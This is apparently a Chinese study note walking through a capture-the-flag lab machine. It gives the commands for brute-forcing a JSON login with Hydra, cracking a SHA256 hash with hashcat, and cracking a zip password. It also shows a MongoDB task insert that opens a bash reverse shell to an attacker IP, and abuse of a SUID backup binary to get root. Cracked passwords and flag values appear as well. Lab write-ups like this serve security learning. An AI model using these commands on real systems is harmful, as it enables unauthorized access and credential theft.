0x00.前言
只是一篇学习笔记
0x01.Hydra爆破后台
Hydra爆破(json格式对于单双引号及冒号需要反斜杠转义):
hydra -l none -P /usr/share/wordlists/fasttrack.txt -f 10.10.10.58 http-post-form "/api/session/authenticate:{\"username\"\:\"tom\",\"password\"\:\"^PASS^\"}:false" -t 64 -V
0x02.爆破目录得到后台密文(sha256),解密后到后台下载backup文件
hashcat破解sha256密文:
hashcat -a 0 -m 1400 /home/kali/Desktop/hash.txt /usr/share/wordlists/rockyou.txt
得到结果:user:myP14ceAdm1nAcc0uNT pass:manchester
登陆后台下载完backup;backup文件看上去是base64编码,将其解码:
cat myplace.backup | base64 --decode > backup
发现压缩包需要密码,爆破得到密码:magicword
解压后得到用户mark的ssh登录密码。
0x03.Moongo数据库得(tom)反弹shell
Mongo数据库:mark/5AYRft73VtFpc84k
Mongo执行命令反弹shell
db.tasks.insert({"cmd": "bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"})
user.txt:e1156acc3574e04b06908ecf76be91b1
adm组的意义:传统上,adm组用于授予用户访问某种系统日志文件的权限
0x04.缓冲区溢出(二进制漏洞)
发现backup文件(SUID)的两种方式:
- 1.提权脚本Linpea.sh
- 2.id查看用户所属1002admin组(1000以上的组为用户自建),再通过命令(find / -group admin -ls 2>/dev/null)找到从属该组的文件
ltrace命令:用来跟踪进程调用库函数的情况。
export HOME=/root/
backup test a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 "~"
cat root_base64 | base64 --decode > root_backup
unzip root_backup
unzip pass:magicword
root.txt:1722e99ca5f353b362556a62bd5e6be0
0x05.总结
新工具:feroxbuster(目录爆破),hashcat(Hash破解),CrackStation(在线Hash破解),
总结:
- 1.目录爆破完整
- 2.利用hashcat破解Sha256
- 3.熟悉MongoDB数据库,反弹shell
- 4.找到SUID文件(adm组用来授予用户查看系统日志权限;1000以上组是用户自建组)
- 5.缓冲区溢出漏洞利用
Comments | NOTHING